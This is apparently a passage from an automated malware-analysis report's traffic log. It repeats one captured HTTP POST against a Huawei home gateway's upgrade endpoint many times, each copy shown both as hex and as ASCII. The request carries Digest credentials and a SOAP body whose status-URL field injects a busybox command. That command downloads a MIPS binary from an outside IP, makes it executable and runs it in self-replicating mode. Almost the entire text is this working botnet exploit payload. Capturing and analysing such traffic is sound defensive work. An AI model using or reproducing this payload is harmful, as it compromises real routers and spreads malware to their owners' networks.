xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 